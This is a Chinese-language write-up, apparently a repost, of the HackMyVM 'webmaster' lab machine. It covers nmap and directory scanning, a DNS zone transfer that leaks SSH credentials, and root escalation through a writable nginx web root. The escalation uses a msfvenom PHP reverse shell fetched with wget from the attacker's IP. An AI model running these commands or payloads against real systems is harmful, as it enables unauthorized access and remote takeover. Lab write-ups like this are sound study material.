当前位置:网站首页>HackMyvm靶机系列(1)-webmaster
HackMyvm靶机系列(1)-webmaster
2022-07-06 09:22:00 【月应知我意】
一、信息收集
首先先使用nmap扫描网段,探测存活主机,由于这是校园网主机比较多就不一一找了,使用grep直接找到目标主机。
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
对目标主机进行端口扫描,探测目标开放的服务
nmap -sT -T4 -sV -O -A -sC -p- 192.168.200.8
扫描到三个服务,ssh,dns,http
访问一下,发现是一张图片,大致意思就是你把密码保存在哪里?Bitwarden和Keepass百度一下是一种密码管理工具。记住下面那个TXT,是个重要提示。
使用dirsearch扫描一下目录。
dirsearch -u http://192.168.200.8 -e php,html,txt,7z,zip,gz,db,bz2,bak -x 404,301,500-599 -t 30
然而并没有发现什么有用信息。
上面图片提示到txt,于是尝试一下使用wfuzz爆破一下txt文件
wfuzz -c --sc=200,302 -w /tools/dict/directory-list-2.3-medium.txt http://192.168.200.8/FUZZ.txt
和使用dirsearch一样,一条有用的消息都没有发现
然后查看一下页面源代码,发现一个webmaster.hmv,看上去像是一个域名。于是把它放到host文件中解析,然而并没有什么用。
二、漏洞利用
想到刚才用nmap扫描到有开放dns服务,尝试一下用dig解析一下dns记录
dig axfr @192.168.200.8 webmaster.hmv
#@IP地址 指定DNS服务器
发现这个东西十分可疑,看上去像是一个账号和密码
john:Myhiddenpazzword
尝试登录ssh,登录成功
得到第一个flag
三、权限提升
接下来就是提权操作了
sudo -l
发现nginx可以以任何用户启动,并且不需要输入密码。
通过查看进程,发现nginx是以root权限启动的。
然后查看网页根目录,发现根目录任何人都拥有删除和写入文件的权限,再加上nginx是以root权限启动的,我们可以通过写入shell,再访问这个shell获得权限。
先查看一下主机信息,是86位的
使用msf生成木马
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.200.130 lport=5555 -f raw -o shell.php
然后目标机上使用wget将木马下载下来
wget http://192.168.200.130:7890/shell.php
赋予执行权限
chmod +x shell.php
在msf上启动监听
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.200.130
set lport 5555
kali访问木马文件,由于nginx是root权限运行的,所访问shell.php文件时得到的是root权限
msf收到会话,权限为root
拿到最后一个flag
边栏推荐
- 强化学习基础记录
- 强化学习基础记录
- 【黑马早报】上海市监局回应钟薛高烧不化;麦趣尔承认两批次纯牛奶不合格;微信内测一个手机可注册俩号;度小满回应存款变理财产品...
- MATLAB打开.m文件乱码解决办法
- A comprehensive summary of MySQL transactions and implementation principles, and no longer have to worry about interviews
- [during the interview] - how can I explain the mechanism of TCP to achieve reliable transmission
- Implementation of count (*) in MySQL
- 7-1 输出2到n之间的全部素数(PTA程序设计)
- [the Nine Yang Manual] 2021 Fudan University Applied Statistics real problem + analysis
- 4. Branch statements and loop statements
猜你喜欢
(original) make an electronic clock with LCD1602 display to display the current time on the LCD. The display format is "hour: minute: Second: second". There are four function keys K1 ~ K4, and the fun
Relationship between hashcode() and equals()
Leetcode.3 无重复字符的最长子串——超过100%的解法
受检异常和非受检异常的区别和理解
1. First knowledge of C language (1)
UGUI—Text
Canvas foundation 1 - draw a straight line (easy to understand)
2022泰迪杯数据挖掘挑战赛C题思路及赛后总结
It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan
Intensive literature reading series (I): Courier routing and assignment for food delivery service using reinforcement learning
随机推荐
7-1 输出2到n之间的全部素数(PTA程序设计)
Leetcode.3 无重复字符的最长子串——超过100%的解法
[the Nine Yang Manual] 2020 Fudan University Applied Statistics real problem + analysis
2022泰迪杯数据挖掘挑战赛C题思路及赛后总结
强化學習基礎記錄
Beautified table style
【头歌educoder数据表中数据的插入、修改和删除】
TypeScript快速入门
MySQL事务及实现原理全面总结,再也不用担心面试
(original) make an electronic clock with LCD1602 display to display the current time on the LCD. The display format is "hour: minute: Second: second". There are four function keys K1 ~ K4, and the fun
Meituan dynamic thread pool practice ideas, open source
Implementation of count (*) in MySQL
Renforcer les dossiers de base de l'apprentissage
A piece of music composed by buzzer (Chengdu)
强化学习基础记录
使用Spacedesk实现局域网内任意设备作为电脑拓展屏
【MySQL-表结构与完整性约束的修改(ALTER)】
Experiment 9 input and output stream (excerpt)
仿牛客技术博客项目常见问题及解答(一)
7-7 7003 组合锁(PTA程序设计)